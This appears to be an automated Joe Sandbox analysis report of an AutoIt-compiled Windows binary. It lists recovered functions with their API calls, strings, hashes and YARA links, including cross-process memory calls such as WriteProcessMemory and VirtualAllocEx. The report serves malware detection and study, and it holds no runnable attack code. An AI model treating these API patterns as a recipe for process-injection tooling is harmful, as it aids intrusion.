Instruction ID: 39ef8285ac6d47b8c720aa7ec1316df1712aea4b3411f298a86bd165c4cae252
Opcode Fuzzy Hash: 2c07e8a28f99e4185450ea9df65b890afd6fad49cab60c9088524003a91be8c8
Instruction Fuzzy Hash: 1001D472600204BBDB204F24DC88BAE7BBCEF46795F10066AFD08D2220D7B1DD4187A0

Function 00C75244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C75260
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00C7526E
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C75276
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00C75280
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C752BC

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 4c50c897100d780919b910956d0dd04a96d5866fb228ef7f46deeeb1d5ffb6b7
Instruction ID: b17547bfab1dc0b7e32323aaf3553dd811c5473d6f37664d8205adafca7e9fbb
Opcode Fuzzy Hash: 4c50c897100d780919b910956d0dd04a96d5866fb228ef7f46deeeb1d5ffb6b7
Instruction Fuzzy Hash: D5015731D01A19DBCF00EFE5E84CBEDBB78BB08711F40415AE949F2256DBB09A5187A5

Function 00C6810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00C68121
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00C6812B
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C6813A
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00C68141
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C68157

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 90997b93dc7b677b2a4826c3658e94bbfa817c10e0029c8e294a37144d156664
Instruction ID: 39ebc1db735d5a4850d94c5d4b55725f16b3aee9c9f7044b71bed05a5091f34e
Opcode Fuzzy Hash: 90997b93dc7b677b2a4826c3658e94bbfa817c10e0029c8e294a37144d156664
Instruction Fuzzy Hash: 98F04F71200304AFEB210FA5ECDDF6F3BACFF4AB58B10012AF985C6160CA619946DA60

Function 00C6C1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00C6C1F7
GetWindowTextW.USER32(00000000,?,00000100), ref: 00C6C20E
MessageBeep.USER32(00000000), ref: 00C6C226
KillTimer.USER32(?,0000040A), ref: 00C6C242
EndDialog.USER32(?,00000001), ref: 00C6C25C

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 9e58da234436d11de0156af09518a0fe9228ad160d8259355a07ca0f47c7692f
Instruction ID: 85e99c77674819bfd20d5f7d169f5ae02e70507a9979d91be429b70d58fd9968
Opcode Fuzzy Hash: 9e58da234436d11de0156af09518a0fe9228ad160d8259355a07ca0f47c7692f
Instruction Fuzzy Hash: 9901A77050470497EB305B61DD9EBAA7778BF00705F04026EB992D14E1D7E469559B90

Function 00C113B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 00C113BF
StrokeAndFillPath.GDI32(?,?,00C4B888,00000000,?), ref: 00C113DB
SelectObject.GDI32(?,00000000), ref: 00C113EE
DeleteObject.GDI32 ref: 00C11401
StrokePath.GDI32(?), ref: 00C1141C

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 7cf4e4b0cd21919ab8ca1e71cc31ff7f61b743dcf1b14670eafc8336adde50f0
Instruction ID: 358c58460538d1279692b6c0a89a154251876332e8ef633c0d63298cfa95d2cf
Opcode Fuzzy Hash: 7cf4e4b0cd21919ab8ca1e71cc31ff7f61b743dcf1b14670eafc8336adde50f0
Instruction Fuzzy Hash: 8DF0EC30045B08EBDB115F26EC4C79C3FA8A702726F1C822AE969890F1C73559A6FF50

Function 00C22CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 00C30DB6: std::exception::exception.LIBCMT ref: 00C30DEC
Part of subcall function 00C30DB6: __CxxThrowException@8.LIBCMT ref: 00C30E01

Part of subcall function 00C17DE1: _memmove.LIBCMT ref: 00C17E22

Part of subcall function 00C17A51: _memmove.LIBCMT ref: 00C17AAB

__swprintf.LIBCMT ref: 00C22ECD

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00C22D66

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: af0cba9d831351e692e6960f85d4e863173ab179b783504512a8bb07705065f5
Instruction ID: 21963efd848ed2200b41f9a9ecf3ce592df37911556f87fb23e05457814377e8
Opcode Fuzzy Hash: af0cba9d831351e692e6960f85d4e863173ab179b783504512a8bb07705065f5
Instruction Fuzzy Hash: 35919375108311AFC714EF24D895CAF77B8EF86311F00491DF8959B2A1DA30EE88EB52

Function 00C7B93B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 00C14750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C14743,?,?,00C137AE,?), ref: 00C14770

CoInitialize.OLE32(00000000), ref: 00C7B9BB
CoCreateInstance.OLE32(00CA2D6C,00000000,00000001,00CA2BDC,?), ref: 00C7B9D4
CoUninitialize.OLE32 ref: 00C7B9F1

Part of subcall function 00C19837: __itow.LIBCMT ref: 00C19862
Part of subcall function 00C19837: __swprintf.LIBCMT ref: 00C198AC

Strings

.lnk, xrefs: 00C7B99D, 00C7B9AB

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
String ID: .lnk
API String ID: 2126378814-24824748
Opcode ID: 3244dce9800cafa2cac7aca14a4ec763704eaed1b5b1ebb50ee633bf18451c6f
Instruction ID: 62f050121d80f066d8edd896cc5a3481efecf59380399544aa0625c23f42a355
Opcode Fuzzy Hash: 3244dce9800cafa2cac7aca14a4ec763704eaed1b5b1ebb50ee633bf18451c6f
Instruction Fuzzy Hash: 3AA16A756043059FC700EF14C894E5AB7E5FF8A314F148998F8A99B3A1CB31ED86DB91

Function 00C3501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00C350AD

Part of subcall function 00C400F0: __87except.LIBCMT ref: 00C4012B

Strings

pow, xrefs: 00C35085, 00C350A2

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: aafa56cf877cbd72122b017598f14d059965fcc8958aad21e6484b30a892b787
Instruction ID: c1bd4ca839f0e6bed48aee3b8c554882165fb1678a9926cde835e1ff708c40cc
Opcode Fuzzy Hash: aafa56cf877cbd72122b017598f14d059965fcc8958aad21e6484b30a892b787
Instruction Fuzzy Hash: BD518C71A6C90286DB257724CD4136E3B90FB41710F308E59E5E6862E9DF758FC4AAC2

Function 00C26192 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C26248
_memmove.LIBCMT ref: 00C262E4
_memset.LIBCMT ref: 00C26308

Strings

ERCP, xrefs: 00C261B3

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: _memset$_memmove
String ID: ERCP
API String ID: 2532777613-1384759551
Opcode ID: 22b6d0e52b991a31fed95cfcd9c1ac641ae41098dc8d89312b0f7727dd37d61f
Instruction ID: 5da9b6780dea246e3ce62b1b7fd2ed7867420ad5924f3bfe64559cb6e6e0c7ee
Opcode Fuzzy Hash: 22b6d0e52b991a31fed95cfcd9c1ac641ae41098dc8d89312b0f7727dd37d61f
Instruction Fuzzy Hash: 1D51AEB1A00715DBDB24CFA5D885BABB7F4EF04304F20456EE85ADB691E770EA44CB90

Function 00C697F5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C714BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C69296,?,?,00000034,00000800,?,00000034), ref: 00C714E6

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00C6983F

Part of subcall function 00C71487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C692C5,?,?,00000800,?,00001073,00000000,?,?), ref: 00C714B1

Part of subcall function 00C713DE: GetWindowThreadProcessId.USER32(?,?), ref: 00C71409
Part of subcall function 00C713DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00C6925A,00000034,?,?,00001004,00000000,00000000), ref: 00C71419
Part of subcall function 00C713DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00C6925A,00000034,?,?,00001004,00000000,00000000), ref: 00C7142F

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C698AC
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C698F9

Strings

@, xrefs: 00C69911

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: f480e82bc6954823b7b07e8be5d329fe1d9f3ef732a2280333023f2c4d861195
Instruction ID: 98a1b05839c5279d54fae54f8e0d9227ca75567deb427b45b36d54e61284b90d
Opcode Fuzzy Hash: f480e82bc6954823b7b07e8be5d329fe1d9f3ef732a2280333023f2c4d861195
Instruction Fuzzy Hash: 5141417690021CBFDB20DFA4CC85ADEBBB8EB09300F044199FA59B7191DA716F45DBA0

Function 00C97946 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00C9F910,00000000,?,?,?,?), ref: 00C979DF
GetWindowLongW.USER32 ref: 00C979FC
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00C97A0C

Strings

SysTreeView32, xrefs: 00C979B1

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: e45bc14e3c15bac06e8ee2e424c01d6aecadb1cdae8bc5d962741774dcbd17b9
Instruction ID: 414b794853ee27b4bc0b0b1a53fe00d7191ebdcf8441ccd9fabb3e138a07d034
Opcode Fuzzy Hash: e45bc14e3c15bac06e8ee2e424c01d6aecadb1cdae8bc5d962741774dcbd17b9
Instruction Fuzzy Hash: 6831B031215206ABDF118F38DC49BEA77A9EB05324F254725F875D22E0D731EE61AB50

Function 00C973D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00C97461
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00C97475
SendMessageW.USER32(?,00001002,00000000,?), ref: 00C97499

Strings

SysMonthCal32, xrefs: 00C9742C

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: 203fbcdc47d809fff6e4c19dc571f1c03ed73c033ec11d0950d4ff9def3f6592
Instruction ID: 3975e4cac6b2b3d4b457d30aeab1b2672d456d6e70fc94fe1c9cf29136667950
Opcode Fuzzy Hash: 203fbcdc47d809fff6e4c19dc571f1c03ed73c033ec11d0950d4ff9def3f6592
Instruction Fuzzy Hash: 60219132510218BBDF118F54DC4AFEE3B69EB48724F110214FE156B1D1DA75AC51DBA0

Function 00C97B93 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00C97C4A
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00C97C58
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00C97C5F

Strings

msctls_updown32, xrefs: 00C97BC4

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 4832bf7bc8434ecbdc591665546d68f1a35da41646bf36cd75bd37ad586dce98
Instruction ID: 10c1d45c7efca7da64d5ec62b41c28a03edb027abb231a24cb8848786fac74f8
Opcode Fuzzy Hash: 4832bf7bc8434ecbdc591665546d68f1a35da41646bf36cd75bd37ad586dce98
Instruction Fuzzy Hash: B0218CB5615209AFDB10DF28DCC5EAB37ECEF4A354B140159FA119B3A1CB31EC51AAA0

Function 00C96CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00C96D3B
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00C96D4B
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00C96D70

Strings

Listbox, xrefs: 00C96D08

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: ad5808ca38056986609b186189c78edd72f95baa95ead05602f8d9649be99f6c
Instruction ID: 318a15d2de13aae33c58c99566ebf329a12fe65dc98d2c41645946b7f27b5578
Opcode Fuzzy Hash: ad5808ca38056986609b186189c78edd72f95baa95ead05602f8d9649be99f6c
Instruction Fuzzy Hash: 4B219232610118BFDF118F54DC49FBB3BBAEF89750F118129F9659B1E0C6719C5197A0

Function 00C9770E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00C97772
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00C97787
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00C97794

Strings

msctls_trackbar32, xrefs: 00C97749

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 0d60aa055bfd05fb5366f05bdcdb914d39535e85ebbd1f54c4dad1c8cae214f9
Instruction ID: d1ccb05bb15a4cc4df1cfa5507ef82e1d07025ab05b9f0949e4b4b57a52b55c3
Opcode Fuzzy Hash: 0d60aa055bfd05fb5366f05bdcdb914d39535e85ebbd1f54c4dad1c8cae214f9
Instruction Fuzzy Hash: 06113A72210208BFEF255FA1CC09FEB3768EF88B54F11422CFA5192090C271E811DB10

Function 00C51935 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 00C51775

Part of subcall function 00C8BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,00C5195E,?), ref: 00C8BFFE
Part of subcall function 00C8BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00C8C010

FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00C5196D

Strings

WIN_XPe, xrefs: 00C51788
(l, xrefs: 00C51935

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Library$AddressDirectoryFreeLoadProcSystem
String ID: (l$WIN_XPe
API String ID: 582185067-2603807210
Opcode ID: ec6d94e3d147dc5c44a0a74c70481995f6e38134524f2a77f61bdabaddd92ac7
Instruction ID: ea50502af276b9c9604d3f074d60a8b4dade2adcf57bcde30e167674e4f3a1c8
Opcode Fuzzy Hash: ec6d94e3d147dc5c44a0a74c70481995f6e38134524f2a77f61bdabaddd92ac7
Instruction Fuzzy Hash: 3BF0A574801109EBDB15DB95C988BECBBB8AB08346F580096E912A21A1D7758F89DF64

Function 00C14C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00C14BD0,?,00C14DEF,?,00CD52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00C14C11
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00C14C23

Strings

kernel32.dll, xrefs: 00C14C0C
